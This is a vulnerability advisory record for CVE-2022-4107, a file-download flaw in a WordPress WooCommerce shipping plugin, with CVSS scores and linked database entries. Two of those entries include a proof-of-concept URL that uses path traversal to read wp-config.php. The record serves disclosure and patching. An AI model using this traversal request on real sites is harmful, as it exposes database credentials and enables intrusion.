CVE-2022-4107

2022-12-19T14:15:00

Description

The SMSA Shipping for WooCommerce WordPress plugin before 1.0.5 does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server

Affected Software

CPE Name	Name	Version
cedcommerce:smsa_shipping_for_woocommerce	cedcommerce smsa shipping for woocommerce	1.0.5

{"id": "CVE-2022-4107", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-4107", "description": "The SMSA Shipping for WooCommerce WordPress plugin before 1.0.5 does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server", "published": "2022-12-19T14:15:00", "modified": "2022-12-23T14:35:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4107", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/0b432858-722c-4bda-aa95-ad48e2097302"], "cvelist": ["CVE-2022-4107"], "immutableFields": [], "lastseen": "2022-12-23T16:44:56", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "githubexploit", "idList": ["69ADF0F9-112C-58AD-8949-AEEF75F8B8A7"]}, {"type": "patchstack", "idList": ["PATCHSTACK:E48573572591F91D8CB3838F260C32CB"]}, {"type": "wpexploit", "idList": ["WPEX-ID:0B432858-722C-4BDA-AA95-AD48E2097302"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:0B432858-722C-4BDA-AA95-AD48E2097302"]}]}, "score": {"value": 3.5, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "cedcommerce smsa shipping for woocommerce", "version": 1}]}, "vulnersScore": 3.5}, "_state": {"dependencies": 1671813897, "score": 1671813936, "affected_software_major_version": 1671813947}, "_internal": {"score_hash": "4c020e8741ecad1fc8b27c58006665a2"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-352", "CWE-552"], "affectedSoftware": [{"cpeName": "cedcommerce:smsa_shipping_for_woocommerce", "version": "1.0.5", "operator": "lt", "name": "cedcommerce smsa shipping for woocommerce"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:cedcommerce:smsa_shipping_for_woocommerce:1.0.5:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.0.5", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/0b432858-722c-4bda-aa95-ad48e2097302", "name": "https://wpscan.com/vulnerability/0b432858-722c-4bda-aa95-ad48e2097302", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"wpexploit": [{"lastseen": "2022-12-23T21:05:01", "description": "The plugin does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-11-22T00:00:00", "type": "wpexploit", "title": "SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-4107"], "modified": "2022-11-22T09:16:52", "id": "WPEX-ID:0B432858-722C-4BDA-AA95-AD48E2097302", "href": "", "sourceData": "Open the following URL when being logged in as any user https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&filename=../../../../wp-config.php", "cvss": {"score": 0.0, "vector": "NONE"}}], "patchstack": [{"lastseen": "2022-11-22T14:54:38", "description": "Auth. Arbitrary File Download vulnerability discovered by WPScan in WordPress SMSA Shipping for WooCommerce premium plugin (versions <= 1.0.4).\n\n## Solution\n\n\r\n Update the WordPress SMSA Shipping for WooCommerce plugin to the latest available version (at least 1.0.5).\r\n ", "cvss3": {}, "published": "2022-11-22T00:00:00", "type": "patchstack", "title": "WordPress SMSA Shipping for WooCommerce premium plugin <= 1.0.4 - Auth. Arbitrary File Download vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-4107"], "modified": "2022-11-22T00:00:00", "id": "PATCHSTACK:E48573572591F91D8CB3838F260C32CB", "href": "https://patchstack.com/database/vulnerability/smsa-shipping-for-woocommerce/wordpress-smsa-shipping-for-woocommerce-premium-plugin-1-0-4-auth-arbitrary-file-download-vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpvulndb": [{"lastseen": "2022-12-23T21:05:01", "description": "The plugin does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server\n\n### PoC\n\nOpen the following URL when being logged in as any user https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&filename;=../../../../wp-config.php\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-11-22T00:00:00", "type": "wpvulndb", "title": "SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-4107"], "modified": "2022-11-22T09:16:52", "id": "WPVDB-ID:0B432858-722C-4BDA-AA95-AD48E2097302", "href": "https://wpscan.com/vulnerability/0b432858-722c-4bda-aa95-ad48e2097302", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}]}

CVE-2022-4107

Description

Affected Software

Related